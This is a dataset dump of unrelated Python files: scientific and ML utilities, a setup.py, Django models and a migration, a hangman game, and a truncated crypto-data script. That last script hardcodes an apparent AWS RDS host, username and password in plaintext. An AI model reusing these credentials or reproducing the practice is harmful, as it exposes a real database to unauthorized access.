contribution to the spectrum for each coefficient at spherical
harmonic degree l. If 'per_dlogl', return the spectrum per log
interval dlog_a(l).
base : float, optional, default = 10.
The logarithm base when calculating the 'per_dlogl' spectrum.
Description
-----------
This function returns either the power spectrum, energy spectrum, or
l2-norm spectrum. Total power is defined as the integral of the
function squared over all space, divided by the area the function
spans. If the mean of the function is zero, this is equivalent to the
variance of the function. The total energy is the integral of the
function squared over all space and is 4pi times the total power. The
l2-norm is the sum of the magnitude of the coefficients squared.
The output spectrum can be expresed using one of three units. 'per_l'
returns the contribution to the total spectrum from all angular orders
at degree l. 'per_lm' returns the average contribution to the total
spectrum from a single coefficient at degree l. The 'per_lm' spectrum
is equal to the 'per_l' spectrum divided by (2l+1). 'per_dlogl' returns
the contribution to the total spectrum from all angular orders over an
infinitessimal logarithmic degree band. The contrubution in the band
dlog_a(l) is spectrum(l, 'per_dlogl')*dlog_a(l), where a is the base,
and where spectrum(l, 'per_dlogl) is equal to
spectrum(l, 'per_l')*l*log(a).
"""
if lmax is None:
lmax = len(clm[0, :, 0]) - 1
if (degrees is None):
degrees = _np.arange(lmax+1)
ndegrees = len(degrees)
array = _np.empty(ndegrees)
# First compute l2norm, and then convert to the required normalization
if _np.iscomplexobj(clm):
for i, l in enumerate(degrees):
array[i] = (clm[0, l, 0:l + 1] *
clm[0, l, 0:l + 1].conjugate()).real.sum() + \
(clm[1, l, 1:l + 1] *
clm[1, l, 1:l + 1].conjugate()).real.sum()
else:
for i, l in enumerate(degrees):
array[i] = (clm[0, l, 0:l+1]**2).sum() \
+ (clm[1, l, 1:l+1]**2).sum()
if convention.lower() == 'l2norm':
pass
elif convention.lower() in ('power', 'energy'):
if normalization == '4pi':
pass
elif normalization == 'schmidt':
array /= (2.0 * degrees + 1.0)
elif normalization == 'ortho':
array /= (4.0 * _np.pi)
else:
raise ValueError(
"normalization must be '4pi', 'ortho', or 'schmidt'. " +
"Input value was {:s}".format(repr(normalization)))
else:
raise ValueError(
"convention must be 'power', 'energy', or 'l2norm'. " +
"Input value was {:s}".format(repr(convention)))
if convention.lower() == 'energy':
array *= 4.0 * _np.pi
if unit.lower() == 'per_l':
pass
elif unit.lower() == 'per_lm':
array /= (2.0 * degrees + 1.0)
elif unit.lower() == 'per_dlogl':
array *= degrees * _np.log(base)
else:
raise ValueError(
"unit must be 'per_l', 'per_lm', or 'per_dlogl'." +
"Input value was {:s}".format(repr(unit)))
return array
| [
"[email protected]"
]
| |
967d0339908521e033f2e7ab5123aaae8a304dc1 | 4b8b0be0588f9e5249729f165b72a6b38324837d | /setup.py | fe4f9c413e1a971588bfa6a67604b75d511472a3 | []
| no_license | GlycReSoft2/embed_tandem_ms_classifier | 5e2f569f2b74f2f14f1c1c0cede32de99c150890 | 0495f2234562a9c5dd02d545800c077df2305387 | refs/heads/master | 2020-06-02T09:32:55.457664 | 2015-06-20T21:30:19 | 2015-06-20T21:30:19 | 22,615,207 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,718 | py | import sys
from setuptools import setup, find_packages, Extension
# With gratitude to the SqlAlchemy setup.py authors
from distutils.command.build_ext import build_ext
from distutils.errors import (CCompilerError, DistutilsExecError,
DistutilsPlatformError)
ext_errors = (CCompilerError, DistutilsExecError, DistutilsPlatformError)
if sys.platform == 'win32':
# 2.6's distutils.msvc9compiler can raise an IOError when failing to
# find the compiler
ext_errors += (IOError,)
c_ext = "pyx"
try:
from Cython.Build import cythonize
except:
c_ext = "c"
extensions = [
Extension("glycresoft_ms2_classification.utils.cmass_heap",
["glycresoft_ms2_classification/utils/cmass_heap." + c_ext]),
Extension("glycresoft_ms2_classification.ms.ion_matching",
["glycresoft_ms2_classification/ms/ion_matching." + c_ext]),
Extension("glycresoft_ms2_classification.structure.composition.ccomposition",
["glycresoft_ms2_classification/structure/composition/ccomposition." + c_ext])
]
if c_ext == "pyx":
extensions = cythonize(extensions, annotate=True)
cmdclass = {}
class BuildFailed(Exception):
def __init__(self):
self.cause = sys.exc_info()[1] # work around py 2/3 different syntax
def __str__(self):
return str(self.cause)
class ve_build_ext(build_ext):
# This class allows C extension building to fail.
def run(self):
try:
build_ext.run(self)
except DistutilsPlatformError:
raise BuildFailed()
def build_extension(self, ext):
try:
build_ext.build_extension(self, ext)
except ext_errors:
raise BuildFailed()
except ValueError:
# this can happen on Windows 64 bit, see Python issue 7511
if "'path'" in str(sys.exc_info()[1]): # works with both py 2/3
raise BuildFailed()
raise
cmdclass['build_ext'] = ve_build_ext
def status_msgs(*msgs):
print('*' * 75)
for msg in msgs:
print(msg)
print('*' * 75)
def run_setup(include_cext=True):
setup(
name="GlycReSoft",
version="1.0.2",
packages=find_packages(),
install_requires=[
"scikit-learn >= 0.14.1",
"pandas >= 0.14.0",
"pyyaml >= 3.11",
"pyteomics >= 2.5",
"sqlitedict >= 1.1.0",
"numexpr >= 2.1",
"xray >= 0.3.2"
],
cmdclass=cmdclass,
zip_safe=False,
include_package_data=True,
package_data={
'glycresoft_ms2_classification': ["*.csv", "*.xml", "*.json", "data/*.csv"],
'glycresoft_ms2_classification.structure': ["structure/data/*.csv", "structure/data/*.json"]
},
ext_modules=extensions if include_cext else None,
entry_points={
'console_scripts': [
"glycresoft-ms2 = glycresoft_ms2_classification.__main__:main",
],
'setuptools.installation': [
"eggsecutable = glycresoft_ms2_classification.__main__:main"
]
},
namespace_packages=["glycresoft_ms2_classification"]
)
try:
run_setup(True)
except Exception as exc:
status_msgs(
str(exc),
"WARNING: The C extension could not be compiled, " +
"speedups are not enabled.",
"Failure information, if any, is above.",
"Retrying the build without the C extension now."
)
run_setup(False)
status_msgs(
"WARNING: The C extension could not be compiled, " +
"speedups are not enabled.",
"Plain-Python build succeeded."
)
| [
"[email protected]"
]
| |
7922391a74fbb335d75565df7e040ef6f5fd5cd2 | 7655e4915fc37c795386252949f4888cb8741510 | /movie_data/models.py | 305dc3ecbfa149f5ff009b3e428035c963dfae5c | []
| no_license | StillsSma/django_movies | 59cf883730ced26172fe1c4ad3dbea87e8d4624d | cf49e429ebf957f5b5068dcdfe6517e47bbfcaba | refs/heads/master | 2021-01-17T16:23:46.585776 | 2016-12-31T17:36:08 | 2016-12-31T17:36:08 | 70,194,154 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,621 | py | from django.db import models
# Create your models here.
class Movie(models.Model):
#movideid = models.IntegerField(primary_key=True)
movie_title = models.CharField(max_length=100)
release_date = models.CharField(max_length=11)
videorelease_date = models.CharField(max_length=10)
IMDbURL = models.CharField(max_length=150)
unknown = models.BooleanField()
action = models.BooleanField()
adventure = models.BooleanField()
animation = models.BooleanField()
children = models.BooleanField()
comedy = models.BooleanField()
crime = models.BooleanField()
documentary = models.BooleanField()
drama = models.BooleanField()
fantasy = models.BooleanField()
film_noir = models.BooleanField()
horror = models.BooleanField()
musical = models.BooleanField()
mystery = models.BooleanField()
romance = models.BooleanField()
sciFi = models.BooleanField()
thriller = models.BooleanField()
war = models.BooleanField()
western = models.BooleanField()
def __str__(self):
return self.movie_title
class Rater(models.Model):
#raterid = models.IntegerField(primary_key=True)
age = models.IntegerField()
gender = models.CharField(max_length=1)
occupation = models.CharField(max_length=20)
zipcode = models.CharField(max_length=10)
def __str__(self):
return self.id
class Rating(models.Model):
rater = models.ForeignKey(Rater)
movie = models.ForeignKey(Movie)
rating = models.IntegerField()
timestmp = models.IntegerField()
def __str__(self):
return self.movie, self.rating
| [
"[email protected]"
]
| |
ac2b903968d57e5a20ad2475bdd901522ae13bf0 | abc24a58da46f02551e09b229087420f70b37ddf | /att/upeek/upeek/augment.py | a99891e2ef13c34d68eca5bc4cb9817cad4c0974 | []
| no_license | erikperillo/att | bfd7198a0ea3687e1fac952e2aa6510911b8db19 | 4b02fefc40c4dfde2549857272ad943bff168a7e | refs/heads/master | 2020-07-03T19:36:47.195578 | 2018-07-18T14:30:02 | 2018-07-18T14:30:02 | 67,546,898 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,037 | py | """
The MIT License (MIT)
Copyright (c) 2017 Erik Perillo <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
IN THE SOFTWARE.
"""
"""
Module for data augmentation.
"""
from skimage import io
from skimage import transform as skt
from skimage import filters as skf
import numpy as np
def _get_rng(rng):
if not isinstance(rng, (list, tuple)):
rng = (rng, rng)
return rng
def _rot90(arr, reps=1):
"""
Performs 90 degrees rotation 'reps' times.
Assumes image with shape ([n_samples, n_channels,] height, width).
"""
for __ in range(reps%4):
arr = arr.swapaxes(-2, -1)[..., ::-1]
return arr
def rot90(x, y, reps=1):
x, y = _rot90(x, reps), y if y is None else _rot90(y, reps)
return x, y
def _hmirr(img):
"""
Flips image horizontally.
Assumes image with shape ([n_samples, n_channels,] height, width).
"""
return img[..., ::-1]
def hmirr(x, y):
x, y = _hmirr(x), y if y is None else _hmirr(y)
return x, y
def some_of(x, y=None, ops=[]):
"""
Chooses one operation from ops.
"""
op = np.random.choice(ops)
x = op(x)
if y is not None:
y = op(y)
return x, y
def _rotation(img, angle, **kwargs):
"""
Rotates image in degrees in counter-clockwise direction.
Assumes image in [0, 1] with shape ([n_samples, n_channels,] height, width).
"""
img = img.swapaxes(0, 1).swapaxes(1, 2)
img = skt.rotate(img, angle=angle, resize=False, mode="constant",
preserve_range=True, **kwargs).astype(img.dtype)
img = img.swapaxes(2, 1).swapaxes(1, 0)
return img
def rotation(x, y, rng, **kwargs):
angle = np.random.uniform(*rng)
x = _rotation(x, angle, **kwargs)
y = y if y is None else _rotation(y, angle, **kwargs)
return x, y
def _shear(img, shear):
"""
Shears image.
Assumes image in [0, 1] with shape ([n_samples, n_channels,] height, width).
"""
at = skt.AffineTransform(shear=shear)
img = img.swapaxes(0, 1).swapaxes(1, 2)
img = skt.warp(img, at)
img = img.swapaxes(2, 1).swapaxes(1, 0)
return img
def shear(x, y, rng, **kwargs):
shear = np.random.uniform(*rng)
x, y = _shear(x, shear), y if y is None else _shear(y, shear)
return x, y
def _translation(img, transl):
"""
Performs shift in image in dx, dy = transl.
Assumes image in [0, 1] with shape ([n_samples, n_channels,] height, width).
"""
at = skt.AffineTransform(translation=transl)
img = img.swapaxes(0, 1).swapaxes(1, 2)
img = skt.warp(img, at)
img = img.swapaxes(2, 1).swapaxes(1, 0)
return img
def translation(x, y, rng):
h, w = x.shape[-2:]
transl = (int(np.random.uniform(*rng)*w), int(np.random.uniform(*rng)*h))
x, y = _translation(x, transl), y if y is None else _translation(y, transl)
return x, y
def _add_noise(img, noise):
"""
Adds noise to image.
Assumes image in [0, 1].
"""
img = img + noise
return img
def add_noise(x, y, rng):
noise = np.random.uniform(*rng, size=x.shape).astype("float32")
x, y = _add_noise(x, noise), y
return x, y
def _mul_noise(img, noise):
"""
Multiplies image by a factor.
Assumes image in [0, 1].
"""
img = img*noise
return img
def mul_noise(x, y, rng):
noise = np.random.uniform(*rng)
x, y = _mul_noise(x, noise), y
return x, y
def _blur(img, sigma):
"""
Applies gaussian blur to image.
Assumes image in [0, 1] with shape ([n_samples, n_channels,] height, width).
"""
img = img.swapaxes(0, 1).swapaxes(1, 2)
for i in range(img.shape[-1]):
img[..., i] = skf.gaussian(img[..., i], sigma=sigma)
img = img.swapaxes(2, 1).swapaxes(1, 0)
return img
def blur(x, y, rng=0.5):
sigma = np.random.uniform(*rng)
x, y = _blur(x, sigma), y
return x, y
def identity(x, y):
return x, y
def _unit_norm(img, minn, maxx, dtype="float32"):
img = ((img - minn)/max(maxx - minn, 1)).astype(dtype)
return img
def _unit_denorm(img, minn, maxx, dtype="float32"):
img = (img*(maxx - minn) + minn).astype(dtype)
return img
#mapping of strings to methods
OPS_MAP = {
"rot90": rot90,
"rotation": rotation,
"shear": shear,
"translation": translation,
"add_noise": add_noise,
"mul_noise": mul_noise,
"blur": blur,
"identity": identity,
"hmirr": hmirr,
}
def augment(xy, op_seqs, apply_on_y=False, add_iff_op=True):
"""
Performs data augmentation on x, y sample.
op_seqs is a list of sequences of operations.
Each sequence must be in format (op_name, op_prob, op_kwargs).
Example of valid op_seqs:
[
[
('identity', 1.0, {}),
],
[
('hmirr', 1.0, {}),
('rot90', 1.0, {'reps': 3})
],
[
('rotation', 0.5, {'rng': (-10, 10)}),
]
]
('identity' is necessary to keep the original image in the returned list.)
add_iff_op: adds image to augm list only if some operation happened.
"""
#list of augmented images
augm = []
#pre-processing x, y for augmentation
x, y = xy
x_minn, x_maxx, x_dtype = x.min(), x.max(), x.dtype
x = _unit_norm(x, x_minn, x_maxx, "float32")
if apply_on_y:
y_minn, y_maxx, y_dtype = y.min(), y.max(), y.dtype
y = _unit_norm(y, y_minn, y_maxx, "float32")
#applying sequences
for op_seq in op_seqs:
_x, _y = x.copy(), y.copy() if apply_on_y else None
some_op = False
#applying sequence of operations
for name, prob, kwargs in op_seq:
op = OPS_MAP[name]
if np.random.uniform(0.0, 1.0) <= prob:
some_op = True
_x, _y = op(_x, _y, **kwargs)
#adding sample to augm list
if some_op or not add_iff_op:
_x = _unit_denorm(_x, x_minn, x_maxx, x_dtype)
if apply_on_y:
_y = _unit_denorm(_y, y_minn, y_maxx, y_dtype)
augm.append((_x, _y if apply_on_y else y))
return augm
| [
"[email protected]"
]
| |
c97351ef49dfe8735e8b6a5599c8b563241932cd | 077c91b9d5cb1a6a724da47067483c622ce64be6 | /syn_mem_corruption_3switch_fuzzer_mcs/intermcs_7_/interactive_replay_config.py | f85bde175e0795cebfea56199299bdfee1f657fc | []
| no_license | Spencerx/experiments | 0edd16398725f6fd9365ddbb1b773942e4878369 | aaa98b0f67b0d0c0c826b8a1565916bf97ae3179 | refs/heads/master | 2020-04-03T10:11:40.671606 | 2014-06-11T23:55:11 | 2014-06-11T23:55:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,022 | py |
from config.experiment_config_lib import ControllerConfig
from sts.topology import *
from sts.control_flow import InteractiveReplayer
from sts.simulation_state import SimulationConfig
from sts.input_traces.input_logger import InputLogger
simulation_config = SimulationConfig(controller_configs=[ControllerConfig(start_cmd='./pox.py --verbose openflow.of_01 --address=__address__ --port=__port__ openflow.discovery forwarding.l2_multi_syn_mem_corruption', label='c1', address='127.0.0.1', cwd='pox')],
topology_class=MeshTopology,
topology_params="num_switches=4",
patch_panel_class=BufferedPatchPanel,
multiplex_sockets=False,
kill_controllers_on_exit=True)
control_flow = InteractiveReplayer(simulation_config, "experiments/syn_mem_corruption_3switch_fuzzer_mcs/intermcs_7_/mcs.trace.notimeouts")
# wait_on_deterministic_values=False
# delay_flow_mods=False
# Invariant check: 'InvariantChecker.check_liveness'
# Bug signature: "c1"
| [
"[email protected]"
]
| |
e1147a359018bf44948d2604c26fc6f0e527ea4f | cba46e28e6f60d9bd8cc8c24a3ff8e065e5a8e49 | /scrap_trade_proj/customers/migrations/0019_auto_20191031_1014.py | a3e1ab6db2b7d3beb3329c5de1c8a7ede469ddaa | []
| no_license | Horac-Bouthon/scrap-trade-4 | fb7e9f8f9ec41446318ce03ad5ff7024ad795771 | 7686703ce5783dd4a48dc1d9600cda01aa554faa | refs/heads/master | 2022-12-12T21:52:38.209500 | 2020-03-17T07:50:30 | 2020-03-17T07:50:30 | 227,142,003 | 0 | 0 | null | 2022-11-22T04:39:35 | 2019-12-10T14:33:20 | Python | UTF-8 | Python | false | false | 1,185 | py | # Generated by Django 2.2.6 on 2019-10-31 10:14
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('customers', '0018_auto_20191031_0930'),
]
operations = [
migrations.RemoveField(
model_name='customer',
name='customer_description',
),
migrations.CreateModel(
name='CustomerTranslation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('language', models.CharField(choices=[('en', 'English'), ('de', 'German'), ('cs', 'Czech')], max_length=15, verbose_name='language')),
('customer_description', models.TextField(blank=True, help_text='Short text to discribe the Customer.', null=True, verbose_name='Customer description')),
('model', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='translations', to='customers.Customer', verbose_name='customer')),
],
options={
'abstract': False,
},
),
]
| [
"[email protected]"
]
| |
41bae6481bf4d06f0950f00aeb2ce5087d1eb34d | 5c8139f1e57e06c7eaf603bd8fe74d9f22620513 | /PartC/py字符串的全排列.py | 05bb54b8b4bcd922bdbe01c4e98fa05bea5670c4 | []
| no_license | madeibao/PythonAlgorithm | c8a11d298617d1abb12a72461665583c6a44f9d2 | b4c8a75e724a674812b8a38c0202485776445d89 | refs/heads/master | 2023-04-03T07:18:49.842063 | 2021-04-11T12:02:40 | 2021-04-11T12:02:40 | 325,269,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 212 | py |
from itertools import permutations
string = list(input())
string.sort()
for item in permutations(string):
item = ''.join(item)
print(item)
print('')
# abc
# 输出结果:
abc
acb
bac
bca
cab
cba
| [
"[email protected]"
]
| |
d95bc3af87a938f03bfa83472e86030ed654c535 | 628ab6e412e7c4c755bc42d8137acd3da2d4be0e | /apysc/display/line_cap_interface.py | bf9828ca64f0eef0a21e9688109051205fdc76d5 | [
"MIT",
"CC-BY-4.0"
]
| permissive | TrendingTechnology/apysc | ffd7d9b558707b934c5df127eca817d4f12d619b | 5c6a4674e2e9684cb2cb1325dc9b070879d4d355 | refs/heads/main | 2023-06-01T20:19:20.835539 | 2021-06-20T03:53:33 | 2021-06-20T03:53:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,734 | py | """Class implementation for line cap interface.
"""
from typing import Any
from typing import Dict
from typing import Union
from apysc import String
from apysc.display.line_caps import LineCaps
from apysc.type.revert_interface import RevertInterface
from apysc.type.variable_name_interface import VariableNameInterface
class LineCapInterface(VariableNameInterface, RevertInterface):
_line_cap: String
def _initialize_line_cap_if_not_initialized(self) -> None:
"""
Inilialize _line_cap attribute if it is not
initialized yet.
"""
if hasattr(self, '_line_cap'):
return
self._line_cap = String(LineCaps.BUTT.value)
@property
def line_cap(self) -> Any:
"""
Get this instance's line cap style setting.
Returns
-------
line_cap : String
Line cap style setting.
"""
self._initialize_line_cap_if_not_initialized()
return self._line_cap._copy()
@line_cap.setter
def line_cap(self, value: Any) -> None:
"""
Set line cap style setting.
Parameters
----------
value : String or LineCaps
Line cap style setting to set.
"""
self._update_line_cap_and_skip_appending_exp(value=value)
self._append_line_cap_update_expression()
def _append_line_cap_update_expression(self) -> None:
"""
Append line cap updating expression to file.
"""
from apysc.expression import expression_file_util
from apysc.type import value_util
cap_name: str = value_util.get_value_str_for_expression(
value=self._line_cap)
expression: str = (
f'{self.variable_name}.attr({{"stroke-linecap": {cap_name}}});'
)
expression_file_util.append_js_expression(expression=expression)
def _update_line_cap_and_skip_appending_exp(
self, value: Union[String, LineCaps]) -> None:
"""
Update line cap and skip appending expression to file.
Parameters
----------
value : String or LineCaps
Line cap style setting to set.
"""
from apysc.validation.display_validation import validate_line_cap
if not isinstance(value, (String, LineCaps)):
raise TypeError(
'Not supported line_cap type specified: '
f'{type(value)}'
'\nAcceptable ones are: String or LineCaps.')
validate_line_cap(cap=value)
if isinstance(value, String):
self._line_cap = value._copy()
else:
self._line_cap = String(value.value)
_line_cap_snapshots: Dict[str, str]
def _make_snapshot(self, snapshot_name: str) -> None:
"""
Make value's snapshot.
Parameters
----------
snapshot_name : str
Target snapshot name.
"""
if not hasattr(self, '_line_cap_snapshots'):
self._line_cap_snapshots = {}
if self._snapshot_exists(snapshot_name=snapshot_name):
return
self._initialize_line_cap_if_not_initialized()
self._line_cap_snapshots[snapshot_name] = self._line_cap._value
def _revert(self, snapshot_name: str) -> None:
"""
Revert value if snapshot exists.
Parameters
----------
snapshot_name : str
Target snapshot name.
"""
if not self._snapshot_exists(snapshot_name=snapshot_name):
return
self._line_cap._value = self._line_cap_snapshots[snapshot_name]
| [
"[email protected]"
]
| |
db5504e104deb39722576dde7ff2496054907854 | 9827269c84a2afc599a8ac8ac88027b25ef74d78 | /02_51409_wsd_test.py | bbf880931362d50fdacd70498414a064641df60d | []
| no_license | caonlp/wsd_bert_tensorflow_version | 2dbb7883d8a1bc5cedbe0d69a04a8cdda3ce757f | 7cf786d1803ac6e49292469b1afdf71838295b25 | refs/heads/main | 2023-03-13T22:45:26.361832 | 2021-03-04T06:35:06 | 2021-03-04T06:35:06 | 344,372,725 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,310 | py | import tensorflow as tf
import numpy as np
import codecs
from keras.utils import to_categorical
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
def load_wsd_train_x():
wsd_train_x = codecs.open('51409_train_data', mode = 'r', encoding= 'utf-8')
line = wsd_train_x.readline()
list1 = []
while line:
a = line.split()
b = a[3:]
list1.append(b)
line = wsd_train_x.readline()
return np.array(list1)
wsd_train_x.close()
def load_wsd_test_x():
wsd_test_x = codecs.open('51409_test_data', mode = 'r', encoding= 'utf-8')
line = wsd_test_x.readline()
list1 = []
while line:
a = line.split()
b = a[3:]
list1.append(b)
line = wsd_test_x.readline()
return np.array(list1)
wsd_test_x.close()
def load_wsd_train_y():
wsd_train_y = codecs.open('51409_train_target', mode = 'r', encoding = 'utf-8')
line = wsd_train_y.readline()
list1 = []
while line:
a = line.split()
b = a[1:2]
list1.append(b)
line = wsd_train_y.readline()
return (np.array(list1)).reshape(50,)
wsd_train_y.close()
def load_wsd_test_y():
wsd_test_y = codecs.open('51409_test_target', mode = 'r', encoding = 'utf-8')
line = wsd_test_y.readline()
list1 = []
while line:
a = line.split()
b = a[1:2]
list1.append(b)
line = wsd_test_y.readline()
return (np.array(list1)).reshape(50,)
wsd_test_y.close()
b = np.zeros(50)
wsd_train_x = load_wsd_train_x()
wsd_test_x = load_wsd_test_x()
wsd_train_y = load_wsd_train_y()
wsd_train_y = to_categorical(wsd_train_y)
wsd_train_y = np.c_[wsd_train_y, b]
wsd_test_y = load_wsd_test_y()
wsd_test_y = to_categorical(wsd_test_y)
#wsd_test_y = np.c_[wsd_test_y, b]
max_epoch = 100
train_size = wsd_train_x.shape[0]
batch_size = 10
n_batch = train_size // batch_size
layer_num = 2
gogi_num = 5
if layer_num == 3:
x = tf.placeholder(tf.float32, [None, 768])
y = tf.placeholder(tf.float32, [None, gogi_num])
W1 = tf.Variable(tf.zeros([768, 50]))
b1 = tf.Variable(tf.zeros([50]))
L1 = tf.nn.sigmoid(tf.matmul(x, W1) + b1)
W2 = tf.Variable(tf.zeros([50, gogi_num]))
b2 = tf.Variable(tf.zeros[gogi_num])
predict = tf.nn.softmax(tf.matmul(L1, W2) + b2)
if layer_num == 2:
x = tf.placeholder(tf.float32, [None, 768])
y = tf.placeholder(tf.float32, [None, gogi_num])
W = tf.Variable(tf.zeros([768, gogi_num]))
b = tf.Variable(tf.zeros([gogi_num]))
predict = tf.nn.softmax(tf.matmul(x, W) + b)
loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=y, logits=predict))
train_step = tf.train.AdamOptimizer().minimize(loss)
init = tf.global_variables_initializer()
correct_predict = tf.equal(tf.argmax(y, 1), tf.argmax(predict, 1))
accuracy = tf.reduce_mean(tf.cast(correct_predict, tf.float32))
saver = tf.train.Saver()
with tf.Session() as sess:
sess.run(init)
saver.restore(sess, 'model/51409_wsd_model.ckpt')
print("51409(normal) : " + str(sess.run(accuracy, feed_dict={x:wsd_test_x, y:wsd_test_y})))
| [
"[email protected]"
]
| |
073ae140ad00c7ec2e062e9a960cdce49fe8b96f | e1164e094527d4c987adc9c9147788b0f9ed8af3 | /main.py | 61d3d780e6d7f9dd8110c8b40faaa609f9a2ce7b | []
| no_license | marenthedejong/LaMa-Galgje | d30d5ae9edacbeaf1ee90c4f956f1efa8e8e10b8 | e31f89e291b91af53425c67a28726f4e633de66b | refs/heads/master | 2022-11-12T14:42:09.260316 | 2020-07-03T09:07:58 | 2020-07-03T09:07:58 | 273,059,093 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,543 | py | def galgje():
import random
#zorgt dat er een random woord wordt gekozen uit de lijst
words= ['informatica', 'informatiekunde', 'spelletje', 'aardigheidje', 'scholier','fotografie', 'waardebepaling', 'specialiteit', 'verzekering','universiteit','heesterperk']
#alle woorden waar de computer uit kan kiezen
word = random.choice(words)
#definieert wat de variabele 'word' is en laat computer random woord kiezen
print('Welkom bij lama galgje!')
naam = input("Hoe heet je? ")
#vraagt om naam/input gebruiker
def printHallo(naam):
print('Hallo ' + naam + ', veel plezier!')
#gepersonaliseerde welkomsboodschap
printHallo(naam)
print('Je mag geen cijfers invoeren en je mag slechts 1 letter tegelijk raden. Als je een cijfer intoetst gaat dit niet van je beurten af, maar als je meer letters tegelijk probeert te raden gaat er wel een beurt af. Je mag door zolang je nog beurten hebt.')
#spelregels
print('Je hebt 5 beurten! Het woord is', + len(word), 'letters lang')
#geeft weer hoe lang het woord is
guesses = ''
turns = 5
#zorgt dat er max. 5 beurten zijn
guessed =[]
#lijst met (fout) geraden letters
while turns > 0:
#wat er gebeurt als er nog beurten zijn
failed = 0
#aantal keer dat er fouten worden gemaakt
for letter in word:
if letter in guesses:
print(letter)
else:
print("_")
#laat aantal letters zien en de goed geraden letter op de juiste plek
failed +=1
#het aantal fouten neemt met 1 toe
if failed == 0:
print(naam, ', je hebt gewonnen, gefeliciteerd!')
print("Het woord is: ", word)
opnieuw()
#winnaarsbericht en vraag opnieuw te spelen
guess= input("Raad een letter:").lower()
#vraagt om input gebruiker en zorgt dat het niet uitmaakt of het een grote of kleine letter is die wordt ingevoerd
if guess.isnumeric() == True:
print('Je mag geen cijfers gebruiken!')
#zorgt ervoor dat er een foutboodschap komt bij invoer van een getal
guesses += guess
#laat de computer de geraden letter bij de guesses opslaan
if ( guess not in word and guess.isalpha()and len(guess) ==1):
#dus dit gebeurt alleen als de letter niet in het woord zit en dus een letter (en geef cijfer is)
turns -= 1
#aantal beurten neemt met 1 af
print("FOUT")
print("Je hebt nog maar", + turns, 'beurten!')
guessed.append(guess)
guessed.sort()
#zorgt ervoor dat de fout geraden letters in een lijst komen die ook op alfabetische volgorde staat
print('Deze letters zitten niet in het woord:', guessed)
if len(guess) >1 and guess.isalpha():
print('Je mag slechts 1 letter per keer raden!')
turns -= 1
print("Je hebt nog maar", + turns, 'beurten!')
#als de lengte van de invoer langer dan 1 karakter is neemt het aantal beurten met 1 af en wordt er een foutboodschap getoond
if turns == 0:
print(naam,', je hebt verloren, jammer joh!')
print("Het woord is: ", word)
opnieuw()
#verliesbericht voor als beurten op zijn
def opnieuw():
restart = input("Wil je opieuw spelen?").lower()
if restart == 'ja':
galgje()
elif restart == 'nee':
print('Bedankt voor het spelen, tot ziens!')
exit()
#functie voor het opnieuw spelen van het spel, bij ja gaat het spel opnieuw anders stopt het
galgje()
#laat het spel beginnen
| [
"[email protected]"
]
| |
5269768f48133f066bb8f41c8cc9fb9b612d37d5 | 588f4991cad99f517ca5028e0e41c5b4d5252543 | /contest/keyence2020/C.py | f98ff9ef1e9b01b229f3ad4b4041387f38e11c0f | [
"MIT"
]
| permissive | mola1129/atcoder | 3002ff38cabf0ccb5142bd576ed90419fccde02e | 1d3b18cb92d0ba18c41172f49bfcd0dd8d29f9db | refs/heads/master | 2020-06-16T12:24:49.609707 | 2020-03-14T15:58:42 | 2020-03-14T15:58:42 | 195,571,664 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | n, k, s = map(int, input().split())
ans = []
for i in range(k):
ans.append(s)
for i in range(n - k):
if s + 1 <= 10 ** 9:
ans.append(s + 1)
else:
ans.append(1)
print(*ans)
| [
"[email protected]"
]
| |
309d604e8f4d7daa6c149baff161a6a0f70af028 | 38ba13df9ea6e53c7b924cad1f3bea2de59c7a6a | /nibbler/trading/collectors/testfiles/LINKMAGIC.py | 7312066a4729b9b7734069827034756e0c85723b | []
| no_license | JizzFactoryEmployee/nibblerppman | 0fbc1ce662cf8b4868b41a97291250fae29dc41d | 160e557578a3e8a614450354f6ade233d32b052f | refs/heads/master | 2022-11-14T01:10:31.743000 | 2020-07-04T01:21:52 | 2020-07-04T01:21:52 | 273,835,770 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,447 | py | import pymysql
import time
import pandas as pd
from tqdm import tqdm
from datetime import datetime, timedelta
def LINK():
print('LINKMAGIC START')
try:
data = pd.read_csv(r'/home/nibbler/nibblerppman/nibbler/trading/collectors/coins/LINK/1m/LINK1m.csv')
#if the file is being populated it wont be found, thus a timeout is needed while it populates
except FileNotFoundError:
time.sleep(600)
data = pd.read_csv(r'/home/nibbler/nibblerppman/nibbler/trading/collectors/coins/LINK/1m/LINK1m.csv')
#set up the main connection
my_conn = pymysql.connect(
host='nibbler.cxadmpob69hk.ap-southeast-2.rds.amazonaws.com',
port=3306,
db='CoinData',
user='Nibbler',
password='Nibbler123',
local_infile=1)
my_cursor = my_conn.cursor()
